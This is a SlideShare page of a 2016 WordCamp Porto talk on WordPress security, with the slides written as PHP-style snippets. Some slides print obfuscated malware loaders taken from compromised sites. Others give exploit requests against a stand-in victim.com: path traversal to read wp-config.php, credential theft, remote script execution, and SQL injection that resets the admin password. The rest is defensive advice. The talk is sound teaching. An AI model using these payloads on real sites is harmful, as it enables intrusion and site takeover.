Just for you: FREE 60-day trial to the world’s largest digital library.
The SlideShare family just got bigger. Enjoy access to millions of ebooks, audiobooks, magazines, and more from Scribd.
Cancel anytime.More Related Content
Related Books
Free with a 14 day trial from Scribd
Security and Mobility - WordCamp Porto 2016
- 1. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(); /* Início */
- 2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;
- 3. /* Apresentação */
- 4. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */
- 5. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
- 6. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”; $r=eval(gzinflate(str_rot13(base64_decode($x))));
- 7. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS $first =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”file permissions”); /* Source: Wordfence March 2016 */
- 8. /* O que fazem depois? */ // MOST OF THEM $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */
- 9. /* Site comprometido por um plugin */ // MOST COMMON METHOD $using_method =“Local File Inclusion (LFI) attack.”; // EXAMPLE - INJECTED CODE <?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"} ["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"} ["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g x78x67ycx74x71x73"]="tx69tlx65"; ?>
- 10. /* Site comprometido por um plugin */ // EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER $wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php”); /* Source: http://finalphoenix.me/ */
- 11. /* Site comprometido por um plugin */ // EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR UPLOADING FILES $nonce = file_get_contents(“http://victim.com/wp-admin/admin.php? action=upgrade-plugin”); $credentials = file_get_contents(“http://victim.com/wp-admin/admin.php? action=updraft_ajax_handler&nonce=$nonce”); /* Source: http://finalphoenix.me/ */
- 12. /* Site comprometido por um plugin */ // EXAMPLE - EXECUTING SCRIPTS $script_to_execute =“phpinfo()”; $content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/ admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl= $script_to_execute”); /* Source: http://finalphoenix.me/ */
- 13. /* Site comprometido por um plugin */ // EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION) $context = … $query_to_inject =“update wp_users set password=md5(‘123’) where id=1”; $chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php? page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context); /* Source: http://finalphoenix.me/ */
- 14. /* Site comprometido por um plugin */ // HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS? $simple_solution =“update, update, update!”; $other_tips = array (“dont use old plugins”,“search for news about security issues”,“take a look at the code”);
- 15. /* Site comprometido por brute force */ // PASSWORD GUESSING ATTACK $tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin account”); $how_to_avoid =“two factor authentication”; $other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than x times”);
- 16. /* Site comprometido por outros motivos */ // SET THE CORRECT PERMISSIONS $folders =“0755”; $files =“0644”; $wp_config =“0444”; $htaccess =“0444”;
- 17. /* Site comprometido por outros motivos */ // SET THE CORRECT .HTACCESS CONTENT $things_you_can_do = array(“block IPs”,“protect files”,“allow certain file extensions from wp_content/*”);
- 18. /* Site comprometido por outros motivos */ // HAVE LATEST OS UPDATES INSTALLED if ($i_have_a_server() == true) { update_os(); }
- 19. /* Atualizar, sempre! */ // UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES $always_update = true;
- 20. /* Plugins que ajudam */ // SECURITY PLUGINS install_plugin_by_slug(‘wordfence’); install_plugin_by_slug(‘sucuri-scanner’); install_plugin_by_slug(‘better-wp-security’); // iThemes Security install_plugin_by_slug(‘google-authenticator’);
- 21. /* A nossa solução, aberta para todos */ // OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION $new_approach = install_hellosys();
- 22. // MOBILE APP $name =“HELLOSYS”
- 23. /* A nossa solução, aberta para todos */ // ENTER BETA, STAY TUNED $url =“http://hellodev.us”;
- 24. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:20:00’; thank_you(); /* Fim */